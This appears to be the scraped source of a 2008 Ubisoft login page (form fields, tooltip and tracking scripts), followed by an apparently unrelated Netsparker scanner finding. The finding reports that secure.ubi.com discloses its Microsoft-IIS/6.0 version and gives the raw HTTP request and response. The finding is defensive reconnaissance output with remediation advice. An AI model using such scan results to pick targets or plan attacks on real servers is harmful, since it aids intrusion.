<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">



<tr>
<td/>
<td><font class="fieldname">User Name or Email</font></td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="150" value="" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td><font class="fieldname">Password</font></td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td><a class="link" tabindex=-1 href="/login/ForgotPassword.aspx">Forgot your password?</a></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td><table border="0" cellpadding="0" cellspacing="0"> <tr> <td rowspan="2"><input type="checkbox" name="RememberPassword" value="1"></td> <td rowspan="2"><img src="/login/Skins/images/b.gif" width="5" height="0" border="0" alt=""></td> <td class="content">Remember me on this computer</td> </tr> <tr> <td valign="top"> <a class="link" tabIndex=-1 href='/login/Help.aspx'>What does this mean?</a> </td> </tr></table></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>


<input type="hidden" name="_buttonClicked" id="_buttonClicked" value="submit">

<tr>
<td/>
<td height="30" />
</tr>
<tr>
<td/>
<td><input type="image" name="m_ImageButtonSubmit" id="m_ImageButtonSubmit" onclick="document.forms['UIMForm']._buttonClicked.value='submit';return true;" OnMouseOver="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit_over.gif')" OnMouseOut="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit.gif')" src="/login/Skins/default/en-US/btn_Submit.gif" alt="" border="0" />
<a OnMouseOver="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel_over.gif')" OnMouseOut="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel.gif')" href="http://www.ubi.com/US/"><img id="m_ImageCancel" src="/login/Skins/default/en-US/btn_Cancel.gif" alt="" border="0" /></a></td>
</tr>




</table>

</div>
<div style="clear:both;"></div>

<table>
<tr>
<td>

<!--FOOTER en-US-->
<div id="footer">

<div style="float:right; margin-top:5px;">
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy"><img src="/login/Skins/images/ectppsubisoft.gif" alt="" border="0" /></a>
</div>

<p>
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy">Privacy Policy</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=TermsOfUse">Terms of Use</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=Legal">Legal Info</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=ContactUs">Contact Us</a> |
<a href="http://www.ubisoftgroup.com/Jobs/Default.aspx?country=US">Employment</a> |
<a href="http://www.ubisoftgroup.com/MediaCenter/Default.aspx?lang=en-US">Presse</A> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=About">About Ubisoft</A>
</p>
<p>© 2008 Ubisoft Entertainment. All Rights Reserved.<br/>
Ubisoft, Ubi.com and the Ubisoft logo are trademarks of Ubisoft Entertainment in the U.S. and/or other countries.</p>
</div>
<!--END FOOTER en-US-->
<tr><td>
<!-- Ubi stat code start -->
<script type='text/javascript'>
<!--
ubi_tag = 'WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN';
ubi_system = 'WEB';
ubi_umon_domain = 'uts.ubi.com';
ubi_umon_protocol = 'https';
-->
</script>
<script type='text/javascript' src='https://uts.ubi.com/scripts/umon2.1.js'>
</script>
<noscript>
<img height=1 width=1 src='https://uts.ubi.com/stats.aspx?system=WEB&tag=WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN&ref=https%3a%2f%2fsecure.ubi.com%2flogin%2f'>
</noscript>
<!-- Ubi stat code end -->
</td></tr>
</td>
</tr>
</table>


</div>
<div style="clear:both;"></div>

</div>

</tr>
</td>
</table>







<div id="toolTipLayerSizeDetect" style="position:absolute; visibility: hidden; left:0;"></div>
<div id="toolTipLayer" style="position:absolute; visibility: hidden; left:0;"></div>
<script language="JavaScript">
<!--
var ns4 = document.layers;
var ns6 = document.getElementById && !document.all;
var ie4 = document.all;

initToolTips();

function toolTip(msg)
{
var bLocationTop = 0;

var curHeight = 0;

putToolTipContent(msg, true, true);

if(toolTipLayerSizeDetectObject.clientHeight){
curHeight = toolTipLayerSizeDetectObject.clientHeight;
}else{
curHeight = toolTipLayerSizeDetectObject.offsetHeight;
}

if (ns4||ns6){
if (yCoordinate < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
else{
if (event.clientY < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
}

function putToolTipContent(msg, bTestDiv, bTop){
var content= '';

if (bTop)
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"><img src="/login/Skins/images/b_arrow_top.gif" width="33" height="13"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}
else
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"><img src="/login/Skins/images/b_arrow_bottom.gif" width="33" height="13"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}

if(bTestDiv){
if(ns4)
{
toolTipSTYLE_DETECT.document.write(content);
toolTipSTYLE_DETECT.document.close();
}
if(ns6)
{
document.getElementById("toolTipLayerSizeDetect").innerHTML=content;
}
if(ie4)
{
document.all("toolTipLayerSizeDetect").innerHTML=content;
}
}else{
if(ns4)
{
toolTipSTYLE.document.write(content);
toolTipSTYLE.document.close();
toolTipSTYLE.visibility = "visible";
}
if(ns6)
{
document.getElementById("toolTipLayer").innerHTML = content;
toolTipSTYLE.display='block';
}
if(ie4)
{
document.all("toolTipLayer").innerHTML=content;
toolTipSTYLE.display='block';
}
}
}

//-->
</script>

<script type="text/javascript">document.getElementById('login').focus();</script>

</form>
</body>
</HTML>
IIS Version Disclosure

IIS Version Disclosure

1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /

/

Extracted Version

Microsoft-IIS/6.0

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.ubi.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Length: 125
Content-Type: text/html
Content-Location: http://secure.ubi.com/default.htm
Last-Modified: Mon, 28 Jun 2004 17:54:10 GMT
Accept-Ranges: bytes
ETag: "8142aea385dc41:345d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 22 Apr 2011 16:27:00 GMT


<html>
<head>
<meta http-equiv="REFRESH" content="0; URL=https://secure.ubi.com/login/">
</head>
<body>
</body>
</html>